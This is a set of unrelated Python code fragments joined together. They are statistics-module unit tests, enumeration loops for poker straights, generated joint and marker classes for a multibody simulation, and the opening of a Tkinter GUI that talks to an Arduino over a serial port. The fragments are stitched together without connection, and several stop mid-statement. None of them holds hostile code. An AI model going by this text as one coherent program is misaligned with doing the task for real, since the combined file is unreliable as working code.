super().__init__(*args, **kwargs)
self.func = calcstats.product
def testEmptyData(self):
# Override UnivariateMixin method.
for empty in ([], (), iter([])):
self.assertEqual(self.func(empty), 1)
for start in (Fraction(23, 42), Decimal('3.456'), 123.456):
self.assertEqual(self.func(empty, start), start)
def testStartArgument(self):
# Test that the optional start argument works correctly.
data = [random.uniform(-10, 10) for _ in range(100)]
t = self.func(data)
for start in (2.1, -3.7, 1e10):
self.assertApproxEqual(self.func(data, start), t*start, rel=2e-15)
def testFractionProduct(self):
F = Fraction
data = [F(9, 4), F(3, 7), 2, -F(2, 5), F(1, 3), -F(1, 3)]
start = F(1, 2)
expected = F(3, 70)
self.assertEqual(self.func(data, start), expected)
def testDecimalProduct(self):
D = Decimal
data = [D('0.5'), 8, -D('4.75'), D('2.0'), D('3.25'), -D('5.0')]
start = D('1.5')
expected = D('926.25')
self.assertEqual(self.func(data, start), expected)
def testFloatSubclass(self):
class MyFloat(float):
def __mul__(self, other):
return MyFloat(super().__mul__(other))
__rmul__ = __mul__
data = [2.5, 4.25, -1.0, 3.5, -0.5, 0.25]
data = map(MyFloat, data)
expected = MyFloat(4.6484375)
actual = self.func(data)
self.assertEqual(actual, expected)
self.assertTrue(isinstance(actual, MyFloat))
def testFloatProduct(self):
data = [0.71, 4.10, 0.18, 2.47, 3.11, 0.79, 1.52, 2.31]
expected = 11.1648967698 # Calculated with HP-48GX.
self.assertApproxEqual(self.func(data), 11.1648967698, tol=1e-10)
data = [2, 3, 5, 10, 0.25, 0.5, 2.5, 1.5, 4, 0.2]
self.assertEqual(self.func(data), 112.5)
# === Test means ===
class RunningMeanTest(unittest.TestCase, TestConsumerMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.running_mean
def testFloats(self):
cr = self.func()
data = [3, 5, 0, -1, 0.5, 1.75]
expected = [3, 4.0, 8/3, 1.75, 1.5, 9.25/6]
assert len(data)==len(expected)
for x, y in zip(data, expected):
self.assertEqual(cr.send(x), y)
def testFractions(self):
F = Fraction
data = [F(3, 5), F(1, 5), F(1, 3), 3, F(5, 3)]
expected = [F(3, 5), F(2, 5), F(17, 45), F(31, 30), F(29, 25)]
assert len(data)==len(expected)
rs = self.func()
for f, y in zip(data, expected):
x = rs.send(f)
self.assertEqual(x, y)
self.assertTrue(isinstance(x, Fraction))
def testDecimals(self):
D = Decimal
data = [D('3.4'), 2, D('3.9'), -D('1.3'), D('4.2')]
expected = [D('3.4'), D('2.7'), D('3.1'), D('2.0'), D('2.44')]
assert len(data)==len(expected)
rs = self.func()
for d, y in zip(data, expected):
x = rs.send(d)
self.assertEqual(x, y)
self.assertTrue(isinstance(x, Decimal))
class MeanTest(NumericTestCase, UnivariateMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.mean
self.data = [1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]
self.expected = 5.5
def setUp(self):
random.shuffle(self.data)
def testSeq(self):
self.assertApproxEqual(self.func(self.data), self.expected)
def testShiftedData(self):
# Shifting data shouldn't change the mean.
data = [x + 1e9 for x in self.data]
expected = self.expected + 1e9
assert expected != 1e9
self.assertApproxEqual(self.func(data), expected)
def testIter(self):
self.assertApproxEqual(self.func(iter(self.data)), self.expected)
def testSingleton(self):
for x in self.data:
self.assertEqual(self.func([x]), x)
def testDoubling(self):
# Average of [a,b,c...z] should be same as for [a,a,b,b,c,c...z,z].
data = [random.random() for _ in range(1000)]
a = self.func(data)
b = self.func(data*2)
self.assertApproxEqual(a, b)
def testAddMean(self):
# Adding the mean to a data set shouldn't change the mean.
data = [random.random() for _ in range(1000)]
a = self.func(data)
data.extend([a]*123)
random.shuffle(data)
b = self.func(data)
self.assertApproxEqual(a, b, tol=1e-15)
# === Test variances and standard deviations ===
class WelfordTest(NumericTestCase, TestConsumerMixin):
# Expected results were either calculated by hand, or using a HP-48GX
# calculator with the RPL program: « Σ+ PVAR NΣ * »
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.welford
def testFloats(self):
cr = self.func()
data = [2.5, 3.25, 5, -0.5, 1.75, 2.5, 3.5]
expected = [0.0, | |
H[11], D[12], H[0]})
STRAIGHT_HHHDD = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHHDD.append({H[i], H[j], H[k], D[l], D[m]})
STRAIGHT_HHHDD.append({H[9], H[10], H[11], D[12], D[0]})
STRAIGHT_HHDSS = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDSS.append({H[i], H[j], D[k], S[l], S[m]})
STRAIGHT_HHDSS.append({H[9], H[10], D[11], S[12], S[0]})
STRAIGHT_HHDSC = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDSC.append({H[i], H[j], D[k], S[l], C[m]})
STRAIGHT_HHDSC.append({H[9], H[10], D[11], S[12], C[0]})
STRAIGHT_HHDSH = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDSH.append({H[i], H[j], D[k], S[l], H[m]})
STRAIGHT_HHDSH.append({H[9], H[10], D[11], S[12], H[0]})
STRAIGHT_HHDSD = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDSD.append({H[i], H[j], D[k], S[l], D[m]})
STRAIGHT_HHDSD.append({H[9], H[10], D[11], S[12], D[0]})
STRAIGHT_HHDCS = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDCS.append({H[i], H[j], D[k], C[l], S[m]})
STRAIGHT_HHDCS.append({H[9], H[10], D[11], C[12], S[0]})
STRAIGHT_HHDCC = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDCC.append({H[i], H[j], D[k], C[l], C[m]})
STRAIGHT_HHDCC.append({H[9], H[10], D[11], C[12], C[0]})
STRAIGHT_HHDCH = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDCH.append({H[i], H[j], D[k], C[l], H[m]})
STRAIGHT_HHDCH.append({H[9], H[10], D[11], C[12], H[0]})
STRAIGHT_HHDCD = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDCD.append({H[i], H[j], D[k], C[l], D[m]})
STRAIGHT_HHDCD.append({H[9], H[10], D[11], C[12], D[0]})
STRAIGHT_HHDHS = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDHS.append({H[i], H[j], D[k], H[l], S[m]})
STRAIGHT_HHDHS.append({H[9], H[10], D[11], H[12], S[0]})
STRAIGHT_HHDHC = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDHC.append({H[i], H[j], D[k], H[l], C[m]})
STRAIGHT_HHDHC.append({H[9], H[10], D[11], H[12], C[0]})
STRAIGHT_HHDHH = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDHH.append({H[i], H[j], D[k], H[l], H[m]})
STRAIGHT_HHDHH.append({H[9], H[10], D[11], H[12], H[0]})
STRAIGHT_HHDHD = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDHD.append({H[i], H[j], D[k], H[l], D[m]})
STRAIGHT_HHDHD.append({H[9], H[10], D[11], H[12], D[0]})
STRAIGHT_HHDDS = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDDS.append({H[i], H[j], D[k], D[l], S[m]})
STRAIGHT_HHDDS.append({H[9], H[10], D[11], D[12], S[0]})
STRAIGHT_HHDDC = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDDC.append({H[i], H[j], D[k], D[l], C[m]})
STRAIGHT_HHDDC.append({H[9], H[10], D[11], D[12], C[0]})
STRAIGHT_HHDDH = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDDH.append({H[i], H[j], D[k], D[l], H[m]})
STRAIGHT_HHDDH.append({H[9], H[10], D[11], D[12], H[0]})
STRAIGHT_HHDDD = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HHDDD.append({H[i], H[j], D[k], D[l], D[m]})
STRAIGHT_HHDDD.append({H[9], H[10], D[11], D[12], D[0]})
STRAIGHT_HDSSS = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HDSSS.append({H[i], D[j], S[k], S[l], S[m]})
STRAIGHT_HDSSS.append({H[9], D[10], S[11], S[12], S[0]})
STRAIGHT_HDSSC = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HDSSC.append({H[i], D[j], S[k], S[l], C[m]})
STRAIGHT_HDSSC.append({H[9], D[10], S[11], S[12], C[0]})
STRAIGHT_HDSSH = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HDSSH.append({H[i], D[j], S[k], S[l], H[m]})
STRAIGHT_HDSSH.append({H[9], D[10], S[11], S[12], H[0]})
STRAIGHT_HDSSD = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HDSSD.append({H[i], D[j], S[k], S[l], D[m]})
STRAIGHT_HDSSD.append({H[9], D[10], S[11], S[12], D[0]})
STRAIGHT_HDSCS = []
for i in range(13):
for j in range(1, 13):
for k in range(2, 13):
for l in range(3, 13):
for m in range(4, 13):
if m == l + 1 and l == k + 1 and k == j + 1 and j == i + 1:
STRAIGHT_HDSCS.append({H[i], D[j], S[k], C[l], S[m]})
STRAIGHT_HDSCS.append({H[9], D[10], S[11], C[12], S[0]})
STRAIGHT_HDSCC = | |
dict(self.visualization)["color"]
class VObjectContactCircleCable2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectContactCircleCable2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], nodeNumber = -1, numberOfContactSegments = 3, contactStiffness = 0., contactDamping = 0., circleRadius = 0., offset = 0., activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.nodeNumber = nodeNumber
self.numberOfContactSegments = numberOfContactSegments
self.contactStiffness = contactStiffness
self.contactDamping = contactDamping
self.circleRadius = circleRadius
self.offset = offset
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'ContactCircleCable2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'nodeNumber', self.nodeNumber
yield 'numberOfContactSegments', self.numberOfContactSegments
yield 'contactStiffness', self.contactStiffness
yield 'contactDamping', self.contactDamping
yield 'circleRadius', self.circleRadius
yield 'offset', self.offset
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
class VObjectContactFrictionCircleCable2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectContactFrictionCircleCable2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], nodeNumber = -1, numberOfContactSegments = 3, contactStiffness = 0., contactDamping = 0., frictionVelocityPenalty = 0., frictionStiffness = 0., frictionCoefficient = 0., circleRadius = 0., offset = 0., activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.nodeNumber = nodeNumber
self.numberOfContactSegments = numberOfContactSegments
self.contactStiffness = contactStiffness
self.contactDamping = contactDamping
self.frictionVelocityPenalty = frictionVelocityPenalty
self.frictionStiffness = frictionStiffness
self.frictionCoefficient = frictionCoefficient
self.circleRadius = circleRadius
self.offset = offset
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'ContactFrictionCircleCable2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'nodeNumber', self.nodeNumber
yield 'numberOfContactSegments', self.numberOfContactSegments
yield 'contactStiffness', self.contactStiffness
yield 'contactDamping', self.contactDamping
yield 'frictionVelocityPenalty', self.frictionVelocityPenalty
yield 'frictionStiffness', self.frictionStiffness
yield 'frictionCoefficient', self.frictionCoefficient
yield 'circleRadius', self.circleRadius
yield 'offset', self.offset
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
class VObjectJointGeneric:
def __init__(self, show = True, axesRadius = 0.1, axesLength = 0.4, color = [-1.,-1.,-1.,-1.]):
self.show = show
self.axesRadius = axesRadius
self.axesLength = axesLength
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'axesRadius', self.axesRadius
yield 'axesLength', self.axesLength
yield 'color', self.color
class ObjectJointGeneric:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], constrainedAxes = [1,1,1,1,1,1], rotationMarker0 = IIDiagMatrix(rowsColumns=3,value=1), rotationMarker1 = IIDiagMatrix(rowsColumns=3,value=1), activeConnector = True, offsetUserFunctionParameters = [0.,0.,0.,0.,0.,0.], offsetUserFunction = 0, offsetUserFunction_t = 0, visualization = {'show': True, 'axesRadius': 0.1, 'axesLength': 0.4, 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.constrainedAxes = constrainedAxes
self.rotationMarker0 = rotationMarker0
self.rotationMarker1 = rotationMarker1
self.activeConnector = activeConnector
self.offsetUserFunctionParameters = offsetUserFunctionParameters
self.offsetUserFunction = offsetUserFunction
self.offsetUserFunction_t = offsetUserFunction_t
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointGeneric'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'constrainedAxes', self.constrainedAxes
yield 'rotationMarker0', self.rotationMarker0
yield 'rotationMarker1', self.rotationMarker1
yield 'activeConnector', self.activeConnector
yield 'offsetUserFunctionParameters', self.offsetUserFunctionParameters
yield 'offsetUserFunction', self.offsetUserFunction
yield 'offsetUserFunction_t', self.offsetUserFunction_t
yield 'Vshow', dict(self.visualization)["show"]
yield 'VaxesRadius', dict(self.visualization)["axesRadius"]
yield 'VaxesLength', dict(self.visualization)["axesLength"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
GenericJoint = ObjectJointGeneric
VGenericJoint = VObjectJointGeneric
class VObjectJointSpherical:
def __init__(self, show = True, jointRadius = 0.1, color = [-1.,-1.,-1.,-1.]):
self.show = show
self.jointRadius = jointRadius
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'jointRadius', self.jointRadius
yield 'color', self.color
class ObjectJointSpherical:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], constrainedAxes = [1,1,1], activeConnector = True, visualization = {'show': True, 'jointRadius': 0.1, 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.constrainedAxes = constrainedAxes
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointSpherical'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'constrainedAxes', self.constrainedAxes
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VjointRadius', dict(self.visualization)["jointRadius"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
SphericalJoint = ObjectJointSpherical
VSphericalJoint = VObjectJointSpherical
class VObjectJointRollingDisc:
def __init__(self, show = True, discWidth = 0.1, color = [-1.,-1.,-1.,-1.]):
self.show = show
self.discWidth = discWidth
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'discWidth', self.discWidth
yield 'color', self.color
class ObjectJointRollingDisc:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], constrainedAxes = [1,1,1], activeConnector = True, discRadius = 0, visualization = {'show': True, 'discWidth': 0.1, 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.constrainedAxes = constrainedAxes
self.activeConnector = activeConnector
self.discRadius = discRadius
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointRollingDisc'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'constrainedAxes', self.constrainedAxes
yield 'activeConnector', self.activeConnector
yield 'discRadius', self.discRadius
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdiscWidth', dict(self.visualization)["discWidth"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
RollingDiscJoint = ObjectJointRollingDisc
VRollingDiscJoint = VObjectJointRollingDisc
class VObjectJointRevolute2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectJointRevolute2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointRevolute2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
RevoluteJoint2D = ObjectJointRevolute2D
VRevoluteJoint2D = VObjectJointRevolute2D
class VObjectJointPrismatic2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectJointPrismatic2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], axisMarker0 = [1.,0.,0.], normalMarker1 = [0.,1.,0.], constrainRotation = True, activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.axisMarker0 = axisMarker0
self.normalMarker1 = normalMarker1
self.constrainRotation = constrainRotation
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointPrismatic2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'axisMarker0', self.axisMarker0
yield 'normalMarker1', self.normalMarker1
yield 'constrainRotation', self.constrainRotation
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
PrismaticJoint2D = ObjectJointPrismatic2D
VPrismaticJoint2D = VObjectJointPrismatic2D
class VObjectJointSliding2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectJointSliding2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], slidingMarkerNumbers = [], slidingMarkerOffsets = [], nodeNumber = -1, classicalFormulation = True, activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.slidingMarkerNumbers = slidingMarkerNumbers
self.slidingMarkerOffsets = slidingMarkerOffsets
self.nodeNumber = nodeNumber
self.classicalFormulation = classicalFormulation
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointSliding2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'slidingMarkerNumbers', self.slidingMarkerNumbers
yield 'slidingMarkerOffsets', self.slidingMarkerOffsets
yield 'nodeNumber', self.nodeNumber
yield 'classicalFormulation', self.classicalFormulation
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
SlidingJoint2D = ObjectJointSliding2D
VSlidingJoint2D = VObjectJointSliding2D
class VObjectJointALEMoving2D:
def __init__(self, show = True, drawSize = -1., color = [-1.,-1.,-1.,-1.]):
self.show = show
self.drawSize = drawSize
self.color = color
def __iter__(self):
yield 'show', self.show
yield 'drawSize', self.drawSize
yield 'color', self.color
class ObjectJointALEMoving2D:
def __init__(self, name = '', markerNumbers = [ -1, -1 ], slidingMarkerNumbers = [], slidingMarkerOffsets = [], slidingOffset = 0., nodeNumbers = [ -1, -1 ], usePenaltyFormulation = False, penaltyStiffness = 0., activeConnector = True, visualization = {'show': True, 'drawSize': -1., 'color': [-1.,-1.,-1.,-1.]}):
self.name = name
self.markerNumbers = markerNumbers
self.slidingMarkerNumbers = slidingMarkerNumbers
self.slidingMarkerOffsets = slidingMarkerOffsets
self.slidingOffset = slidingOffset
self.nodeNumbers = nodeNumbers
self.usePenaltyFormulation = usePenaltyFormulation
self.penaltyStiffness = penaltyStiffness
self.activeConnector = activeConnector
self.visualization = visualization
def __iter__(self):
yield 'objectType', 'JointALEMoving2D'
yield 'name', self.name
yield 'markerNumbers', self.markerNumbers
yield 'slidingMarkerNumbers', self.slidingMarkerNumbers
yield 'slidingMarkerOffsets', self.slidingMarkerOffsets
yield 'slidingOffset', self.slidingOffset
yield 'nodeNumbers', self.nodeNumbers
yield 'usePenaltyFormulation', self.usePenaltyFormulation
yield 'penaltyStiffness', self.penaltyStiffness
yield 'activeConnector', self.activeConnector
yield 'Vshow', dict(self.visualization)["show"]
yield 'VdrawSize', dict(self.visualization)["drawSize"]
yield 'Vcolor', dict(self.visualization)["color"]
#add typedef for short usage:
ALEMovingJoint2D = ObjectJointALEMoving2D
VALEMovingJoint2D = VObjectJointALEMoving2D
#+++++++++++++++++++++++++++++++
#MARKER
class VMarkerBodyMass:
def __init__(self, show = True):
self.show = show
def __iter__(self):
yield 'show', self.show
class MarkerBodyMass:
def __init__(self, name = '', bodyNumber = -1, visualization = {'show': True}):
self.name = name
self.bodyNumber = bodyNumber
self.visualization = visualization
def __iter__(self):
yield 'markerType', 'BodyMass'
yield 'name', self.name
yield 'bodyNumber', self.bodyNumber
yield 'Vshow', dict(self.visualization)["show"]
class VMarkerBodyPosition:
def __init__(self, show = True):
self.show = show
def __iter__(self):
yield 'show', | |
#! /usr/bin/env python2
# v0.11
#///////////////////////////////////////////////////////////////////////////////
#/ MIT License //
#/ //
#/ Copyright (c) [2015] [<NAME>] //
#/ //
#/ Permission is hereby granted, free of charge, to any person obtaining a //
#/ copy of this software and associated documentation files (the "Software"), //
#/ to deal in the Software without restriction, including without limitation //
#/ the rights to use, copy, modify, merge, publish, distribute, sublicense, //
#/ and/or sell copies of the Software, and to permit persons to whom the //
#/ Software is furnished to do so, subject to the following conditions: //
#/ //
#/ The above copyright notice and this permission notice shall be included //
#/ in all copies or substantial portions of the Software. //
#/ //
#/ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR //
#/ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, //
#/ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL //
#/ THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER //
#/ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING //
#/ FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER //
#/ DEALINGS IN THE SOFTWARE. //
#///////////////////////////////////////////////////////////////////////////////
import serial
import time
from Tkinter import *
import Tkinter, Tkconstants, tkFileDialog
import ConfigParser
import tkMessageBox
import Tkinter as tk
from serial import SerialException
import sys
from time import sleep
global reset_var
reset_var = 0;
global running_var
running_var = 0
global curr_NoT
curr_NoT = 0
global lat_OFF_list
lat_OFF_list = []
global lat_ON_list
lat_ON_list = []
global trial_list
trial_list = []
global sides_list
sides_list = []
global dist_OFF_list
dist_OFF_list = []
global dist_ON_list
dist_ON_list = []
global tof_list
tof_list = []
global its_list
its_list = []
global start_t
start_t = 0.0
global stop_OFF_t
stop_OFF_t = 0.0
global stop_ON_t
stop_ON_t = 0.0
global last_t
last_t = 0.0
global lat_OFF
lat_OFF = 0.0
global lat_ON
lat_ON = 0.0
global we_are_moving
we_are_moving = 0
global we_are_flying
we_are_flying = 0
global we_are_balancing
we_are_balancing = 0
global curr_arm
curr_arm = None
global opp_arm
opp_arm = None
global servo1_pos
servo1_pos = 0
global servo2_pos
servo2_pos = 0
global takeoff_t
takeoff_t = None
global landing_t
landing_t = None
global its
its = 0
global before
before = None
global now
now = None
global ser
def portIsUsable(portName):
global ser
try:
ser = serial.Serial(port=portName)
return True
except:
tk.Tk().withdraw() #avoids the second window popping up!
tkMessageBox.showerror("Open Port","Cannot open port\n\n(%s)" % portName)
sys.exit(0)
return False
if portIsUsable('/dev/ttyACM0'):
ser = serial.Serial('/dev/ttyACM0', 115200,timeout=None)
ser.flushInput()
#print("Reset Arduino")
time.sleep(2)
class App (Tkinter.Frame):
def __init__(self, master):
Frame.__init__(self)
global running_var
global return_val
global servoA_dir
servoA_dir= 1
global servoB_dir
servoB_dir = 1
return_val = None
self._start = 0.0
self._elapsedtime = 0.0
self._running = 0
frame = Frame(master)
frame.grid(row=0)
global acclimation_period
acclimation_period = StringVar(master)
acclimation_period.set("2.0")
global iti
iti = StringVar(master)
iti.set("1.0")
global weight
weight = StringVar(master)
weight.set("15")
global speed
speed = StringVar(master)
speed.set("2.3")
global NoT
NoT = StringVar(master)
NoT.set("10")
global acclimation_min
acclimation_min = 0.1
global acclimation_max
acclimation_max = 10
global iti_min
iti_min = 0.1
global iti_max
iti_max = 10
global weight_min
weight_min = 1
global weight_max
weight_max = 50
global speed_min
speed_min = 0.1
global speed_max
speed_max = 5
global NoT_min
NoT_min = 1
global NoT_max
NoT_max = 50
global weight_var_A
weight_var_A=0
global weight_var_B
weight_var_B=0
global vals_to_PC
vals_to_PC = ['0', '0', '0', '0', '0']
global old_vals_to_PC
old_vals_to_PC = ['0', '0', '0', '0', '0']
vcmd_acclimation = master.register(self._OnValidate_acclimation),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
vcmd_iti = master.register(self._OnValidate_iti),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
vcmd_weight = master.register(self._OnValidate_weight),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
vcmd_speed = master.register(self._OnValidate_speed),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
vcmd_NoT = master.register(self._OnValidate_NoT),'%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W'
#ACCLIMATION
self.acclimation = Label(frame, text="Acclimation Period", justify=LEFT,height=2, width=20).grid(row=0,column=0,sticky=W,rowspan=2,padx=(2,0))
